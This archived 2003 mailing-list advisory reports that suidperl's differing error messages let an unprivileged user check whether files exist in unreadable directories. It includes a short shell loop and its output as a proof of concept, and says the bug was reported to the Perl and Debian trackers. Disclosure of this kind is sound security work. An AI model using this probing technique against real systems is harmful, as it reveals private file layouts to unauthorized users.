[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200308270215.h7R2FuJ480542@milan.maths.usyd.edu.au>
From: psz at maths.usyd.edu.au (Paul Szabo)
Subject: suidperl path disclosure
suidperl can be used for path disclosure (to verify if a file exists
when the user has no access to the directories above). The error
messages returned by suidperl are too revealing: in the examples below
I expected a uniform 'permission denied' or similar.
Set things up as one user (e.g. root):
# pwd
/root/ptest
# ls -al
total 8
drwx------ 2 root root 4096 Jul 30 09:36 .
drwx------ 13 root root 4096 Jul 30 09:35 ..
-rwx------ 1 root root 0 Jul 30 09:36 file
-rws------ 1 root root 0 Jul 30 09:36 sfile
As another (normal) user, use suidperl to disclose path info:
$ id
uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),109(tutsols)
$ for n in nosuch file sfile; do
> echo ''; echo Test $n; suidperl /root/ptest/$n
> done
Test nosuch
Can't open perl script "/root/ptest/nosuch": No such file or directory
Test file
Script is not setuid/setgid in suidperl
Test sfile
Permission denied.
I cannot immediately see how this could be used for a root compromise.
This problem was reported to perlbug@...l.com on 23 Mar 2001, see
http://rt.perl.org/rt2/Ticket/Display.html?id=6511
and to submit@...s.debian.org on 30 Jul 2003, see
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=203426
but is apparently not being worked on. Mis-quoting from that latter
reference:
Bug has been reported a month (or two years) ago, but those uncaring,
lazy people have done nothing.
Cheers,
Paul Szabo - psz@...hs.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
Powered by blists - more mailing lists